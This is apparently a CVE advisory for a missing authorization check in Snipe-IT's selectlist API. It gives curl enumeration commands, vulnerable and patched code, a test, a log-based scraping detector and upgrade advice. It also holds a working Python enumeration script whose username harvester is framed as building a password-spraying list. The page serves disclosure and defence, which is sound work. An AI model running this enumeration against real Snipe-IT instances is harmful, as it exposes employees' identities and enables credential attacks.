Snipe-IT Improper Access Control Vulnerability CVE-2026-48492 (Low) -DC-Jun2026-614


The vulnerability exists due to a missing authorization check in the `GET /api/v1/{object}/selectlist` API endpoint when handling authenticated requests. This endpoint is used across multiple object types (accessories, assets, consumables, licenses, and users) to return paginated lists for dropdown/select UI components.
Under normal operation, the endpoint should enforce the `view.selectlists` permission before returning any data. In vulnerable versions, that authorization check is absent. Any user who can log into Snipe-IT, regardless of assigned permissions, can call this endpoint with only their web session cookie. No API token, elevated privileges, or special roles are required.
When an authenticated attacker sends a GET request to `/api/v1/users/selectlist` (or any other object's selectlist endpoint), the application returns a paginated JSON response containing sensitive user fields: `id`, `name` (display name), `username`, and `employee_number`. The `search` parameter narrows the result set, so an attacker can also confirm candidate usernames one at a time; where usernames follow the organization's email naming convention, this amounts to indirect email enumeration.
The exposure scope depends on the Full Multiple Company Support (FMCS) setting. If FMCS is disabled, the endpoint returns every active user account in the entire system. If FMCS is enabled, exposure is limited to accounts within the same company as the authenticated attacker.
An attacker with only a valid login and zero permissions can:
– Enumerate all active user accounts by paginating through the endpoint
– Harvest usernames for credential stuffing or password spray attacks
– Collect employee numbers and full names for social engineering
– Perform indirect email enumeration via the search parameter
– Map user IDs for use in further enumeration against other endpoints
The vulnerability is exploitable only by users who already have a working login to the Snipe-IT instance. The fix, committed as grokability/snipe-it@4f943d4, adds a `$this->authorize('view.selectlists')` check to the `selectlist()` method in each affected API controller (Accessory, Asset, Consumable, License, User), so only users holding that permission can reach the endpoint.

DailyCVE Form:

Platform: ...... Snipe-IT
Version: ........ before 8.1.0 (vulnerable); fixed in 8.1.0+
Vulnerability :.. Improper Access Control (CWE-284)
Severity: ....... Low (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)
date: ........... June 9, 2026
Prediction: ...... Patch expected June 8, 2026 (commit 4f943d4)

What Undercode Say

# Enumerate all users (paginated) - vulnerable endpoint
curl -X GET "https://snipe-it.example.com/api/v1/users/selectlist?limit=50&page=1" \
  -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE"
# Enumerate accessories
curl -X GET "https://snipe-it.example.com/api/v1/accessories/selectlist?limit=100" \
  -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE"
# Enumerate assets with search filter
curl -X GET "https://snipe-it.example.com/api/v1/assets/selectlist?search=admin" \
  -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE"
# Enumerate consumables
curl -X GET "https://snipe-it.example.com/api/v1/consumables/selectlist" \
  -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE"
# Enumerate licenses
curl -X GET "https://snipe-it.example.com/api/v1/licenses/selectlist" \
  -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE"

Example vulnerable controller code (before patch):

public function selectlist(Request $request)
{
// No authorization check - directly returns data
$users = User::select(['users.id', 'users.name', 'users.username', 'users.employee_num']);
// ... pagination logic
return response()->json($users);
}

Patched controller code (after 4f943d4):

public function selectlist(Request $request)
{
$this->authorize('view.selectlists'); // <-- Added gate check
$users = User::select(['users.id', 'users.name', 'users.username', 'users.employee_num']);
// ... pagination logic
return response()->json($users);
}

Test case added to verify fix:

public function test_requires_view_selectlists_permission(): void
{
$this->actingAsForApi(User::factory()->create())
->getJson(route('api.accessories.selectlist'))
->assertForbidden(); // 403 Forbidden for users without permission
}

Exploit

To exploit this vulnerability, an attacker needs:

  1. A valid Snipe-IT user account (any privilege level)
  2. The web session cookie from a successful login

The attacker then sends authenticated GET requests to any of the following endpoints:
  – `/api/v1/users/selectlist`
  – `/api/v1/accessories/selectlist`
  – `/api/v1/assets/selectlist`
  – `/api/v1/consumables/selectlist`
  – `/api/v1/licenses/selectlist`
The response returns a paginated JSON list containing sensitive fields. By iterating through pages and using the `search` parameter, the attacker can systematically enumerate all active user accounts, harvesting usernames, display names, employee numbers, and user IDs. No API token or special permissions are required; only the session cookie is needed.
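
The enumeration walk described in this section and in the vulnerability description above, as an added Python example (not code from the advisory or from the Snipe-IT project). It assumes, since the page does not show them, the response shape `{"items": [...], "page": n, "page_count": n, "total_count": n}`, the `snipeit_session` cookie name from the curl commands above, and that a patched instance answers 403 to a session without `view.selectlists`. `_FAKE_USERS` and the two fake fetchers are constructed so the script runs offline; `http_fetcher` is the stdlib-only path for an authorized test against a real instance.

```python
"""Enumerate a Snipe-IT selectlist endpoint using only a web session cookie.

Added example for this advisory, not code from the Snipe-IT project. Assumed
(not stated on the page): the response shape {"items": [...], "page": n,
"page_count": n, "total_count": n}, the "snipeit_session" cookie name from the
curl commands above, and that a patched instance answers 403 to a user who
lacks the view.selectlists permission.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, List, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

Fetcher = Callable[[str], Tuple[int, dict]]  # URL -> (HTTP status, JSON body or {})
OBJECT_TYPES = ("users", "accessories", "assets", "consumables", "licenses")


def selectlist_url(base_url: str, object_type: str, page: int,
                   limit: int = 50, search: str = "") -> str:
    """Build /api/v1/{object}/selectlist?limit=..&page=..[&search=..]."""
    params = {"limit": limit, "page": page}
    if search:
        params["search"] = search
    return f"{base_url.rstrip('/')}/api/v1/{object_type}/selectlist?{urlencode(params)}"


def http_fetcher(session_cookie: str) -> Fetcher:
    """Live fetcher: plain GET with the session cookie and no API token (stdlib only)."""
    def fetch(url: str) -> Tuple[int, dict]:
        req = urllib.request.Request(url, headers={"Cookie": f"snipeit_session={session_cookie}",
                                                   "Accept": "application/json"})
        try:
            with urllib.request.urlopen(req, timeout=15) as resp:
                return resp.status, json.loads(resp.read().decode("utf-8"))
        except urllib.error.HTTPError as exc:
            return exc.code, {}
    return fetch


def check_endpoint(fetch: Fetcher, base_url: str, object_type: str) -> str:
    """One-page probe with a zero-permission session: 200 means the gate is missing."""
    status, _ = fetch(selectlist_url(base_url, object_type, page=1, limit=1))
    return {200: "vulnerable", 403: "patched"}.get(status, f"unknown:{status}")


def enumerate_selectlist(fetch: Fetcher, base_url: str, object_type: str,
                         search: str = "", limit: int = 50, max_pages: int = 1000) -> List[dict]:
    """Walk every page of the selectlist and return the raw items."""
    items: List[dict] = []
    page = 1
    while page <= max_pages:
        status, body = fetch(selectlist_url(base_url, object_type, page, limit, search))
        if status != 200:
            break  # patched (403), session expired, or throttled: stop rather than loop
        chunk = body.get("items", [])
        items.extend(chunk)
        if not chunk or page >= int(body.get("page_count", page)):
            break
        page += 1
    return items


def harvest_usernames(items: List[dict]) -> List[str]:
    """The field a password-spraying list actually needs, de-duplicated and ordered."""
    return sorted({i["username"] for i in items if i.get("username")})


# Constructed stand-ins so the script runs offline: a vulnerable instance holding
# five users (served in pages of `limit`) and a patched instance that always 403s.
_FAKE_USERS = [
    {"id": 1, "name": "Alice Admin", "username": "alice.admin", "employee_number": "E100"},
    {"id": 2, "name": "Bob Ops", "username": "bob.ops", "employee_number": "E101"},
    {"id": 3, "name": "Carol HR", "username": "carol.hr", "employee_number": ""},
    {"id": 4, "name": "Dave IT", "username": "dave.it", "employee_number": "E103"},
    {"id": 5, "name": "Erin Finance", "username": "erin.fin", "employee_number": "E104"},
]


def fake_vulnerable_fetcher(url: str) -> Tuple[int, dict]:
    q = parse_qs(urlparse(url).query)
    page, limit = int(q.get("page", ["1"])[0]), int(q.get("limit", ["50"])[0])
    search = q.get("search", [""])[0].lower()
    hits = [u for u in _FAKE_USERS if search in u["username"] or search in u["name"].lower()]
    page_count = max(1, -(-len(hits) // limit))  # ceiling division
    start = (page - 1) * limit
    return 200, {"items": hits[start:start + limit], "page": page,
                 "page_count": page_count, "total_count": len(hits)}


def fake_patched_fetcher(url: str) -> Tuple[int, dict]:
    return 403, {"message": "This action is unauthorized."}


if __name__ == "__main__":
    base = "https://snipe-it.example.com"  # for a live check use http_fetcher("<cookie>")
    for label, fetch in (("vulnerable", fake_vulnerable_fetcher), ("patched", fake_patched_fetcher)):
        print(label, {o: check_endpoint(fetch, base, o) for o in OBJECT_TYPES})
    users = enumerate_selectlist(fake_vulnerable_fetcher, base, "users", limit=2)
    print(len(users), "users;", harvest_usernames(users))
    print("search=admin ->", harvest_usernames(enumerate_selectlist(fake_vulnerable_fetcher, base, "users", "admin")))
```

Two things worth keeping from this when testing a real instance: run `check_endpoint` with a freshly created user that has no permission groups at all, since that is the population the advisory is about, and expect `patched` on every one of the five object types, not just `users`; and keep `max_pages` in place so a misbehaving `page_count` cannot turn the walk into a hammering loop.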

Protection

  • Upgrade to Snipe-IT version 8.1.0 or later, which includes the patch from commit `4f943d4`
  • If upgrading is not immediately possible, apply the patch manually: add `$this->authorize('view.selectlists');` at the top of the `selectlist()` method in each of the following controllers:
    – `app/Http/Controllers/Api/AccessoriesController.php`
    – `app/Http/Controllers/Api/AssetsController.php`
    – `app/Http/Controllers/Api/ConsumablesController.php`
    – `app/Http/Controllers/Api/LicensesController.php`
    – `app/Http/Controllers/Api/UsersController.php`
  • Review user permissions and ensure that the `view.selectlists` permission is only granted to roles that genuinely require it
  • Monitor logs for unusual patterns of requests to the `/api/v1/{object}/selectlist` endpoints (sequential paging, several object types from one client, or many distinct `search` values), especially from low-privilege users
  • Implement network-level restrictions if possible, limiting API access to trusted IP ranges
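
The monitoring bullet above in working form, as an added Python example (not Snipe-IT code and not from the advisory). It assumes an nginx "combined" access log in front of Snipe-IT and keys clients by source IP, because the session cookie is not in the access log; the `SAMPLE_LOG` lines and the thresholds (`min_hits`, `min_objects`, `window`) are constructed for the example and would be tuned to a real deployment.

```python
"""Flag clients bulk-reading /api/v1/{object}/selectlist from web-server access logs.

Added example for the monitoring advice in this advisory; it is not Snipe-IT
code. Assumes nginx "combined" access logs in front of Snipe-IT and uses the
source IP as the client key (the session cookie is not logged). The log lines
below are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional
from urllib.parse import parse_qsl

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
SELECTLIST_RE = re.compile(r"^/api/v1/(?P<object>[a-z]+)/selectlist(?:\?(?P<query>.*))?$")


def parse_selectlist_hit(line: str) -> Optional[dict]:
    """Return a parsed event for a selectlist request, or None for any other line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    s = SELECTLIST_RE.match(m["path"])
    if not s:
        return None
    q = dict(parse_qsl(s["query"] or ""))
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "object": s["object"],
        "page": int(q.get("page", "1")),
        "search": q.get("search", ""),
        "status": int(m["status"]),
    }


def find_scrapers(lines: List[str], window: timedelta = timedelta(minutes=5),
                  min_hits: int = 5, min_objects: int = 3) -> Dict[str, dict]:
    """Alert on a client whose selectlist requests inside one window either reach
    min_hits (paging through a list) or touch min_objects distinct object types
    (walking users, assets, licenses, ...). A UI dropdown loading one page of one
    object type stays well under both thresholds."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for line in lines:
        ev = parse_selectlist_hit(line)
        if ev:
            by_ip[ev["ip"]].append(ev)
    alerts: Dict[str, dict] = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):  # sliding window anchored on each request
            win = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            objects = {e["object"] for e in win}
            if len(win) >= min_hits or len(objects) >= min_objects:
                alerts[ip] = {
                    "hits": len(win),
                    "disclosed": sum(1 for e in win if e["status"] == 200),  # 403s = patched
                    "objects": sorted(objects),
                    "max_page": max(e["page"] for e in win),
                    "searches": sorted({e["search"] for e in win if e["search"]}),
                    "from": first["ts"].isoformat(),
                }
                break
    return alerts


# Constructed sample: one client pages users 1..6 and then hits two more object
# types within half a minute; another client's browser loads a single dropdown.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jun/2026:10:15:01 +0000] "GET /api/v1/users/selectlist?limit=50&page=1 HTTP/1.1" 200 4821 "-" "python-urllib/3.12"',
    '203.0.113.7 - - [09/Jun/2026:10:15:03 +0000] "GET /api/v1/users/selectlist?limit=50&page=2 HTTP/1.1" 200 4790 "-" "python-urllib/3.12"',
    '203.0.113.7 - - [09/Jun/2026:10:15:05 +0000] "GET /api/v1/users/selectlist?limit=50&page=3 HTTP/1.1" 200 4805 "-" "python-urllib/3.12"',
    '203.0.113.7 - - [09/Jun/2026:10:15:07 +0000] "GET /api/v1/users/selectlist?limit=50&page=4 HTTP/1.1" 200 4811 "-" "python-urllib/3.12"',
    '203.0.113.7 - - [09/Jun/2026:10:15:09 +0000] "GET /api/v1/users/selectlist?limit=50&page=5 HTTP/1.1" 200 4798 "-" "python-urllib/3.12"',
    '203.0.113.7 - - [09/Jun/2026:10:15:11 +0000] "GET /api/v1/users/selectlist?limit=50&page=6 HTTP/1.1" 200 1207 "-" "python-urllib/3.12"',
    '203.0.113.7 - - [09/Jun/2026:10:15:20 +0000] "GET /api/v1/accessories/selectlist?limit=100 HTTP/1.1" 200 3312 "-" "python-urllib/3.12"',
    '203.0.113.7 - - [09/Jun/2026:10:15:25 +0000] "GET /api/v1/assets/selectlist?search=admin HTTP/1.1" 200 240 "-" "python-urllib/3.12"',
    '198.51.100.4 - - [09/Jun/2026:10:16:40 +0000] "GET /hardware/create HTTP/1.1" 200 15230 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Jun/2026:10:16:41 +0000] "GET /api/v1/assets/selectlist?search=lap HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Jun/2026:10:16:55 +0000] "POST /hardware HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in find_scrapers(SAMPLE_LOG).items():
        print(ip, info)
```

Because the key is the source IP, users behind one NAT gateway will be pooled, so raise `min_hits` for known office egress addresses rather than dropping the rule. The `disclosed` count separates a successful scrape on an unpatched instance (all 200s) from blocked attempts after the upgrade (403s), which still deserve a look at the account behind the session.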

Impact

  • Information Disclosure: Exposes usernames, display names, employee numbers, and user IDs of all active accounts (or within the same company if FMCS is enabled)
  • Credential Attacks: Harvested usernames feed password spraying against the Snipe-IT login portal and, where employees reuse credentials, credential stuffing against other services
  • Social Engineering: Full names and employee numbers provide attackers with convincing pretexts for phishing or vishing campaigns
  • Account Enumeration: The search parameter allows attackers to confirm the existence of specific users, enabling targeted attacks
  • Further Exploitation: Mapped user IDs can be used to probe other API endpoints (e.g., /api/v1/users/{id}) for additional information or vulnerabilities
  • Compliance Violations: Exposure of employee numbers and personally identifiable information may violate GDPR, HIPAA, or other data protection regulations


Sources:

Reported By: github.com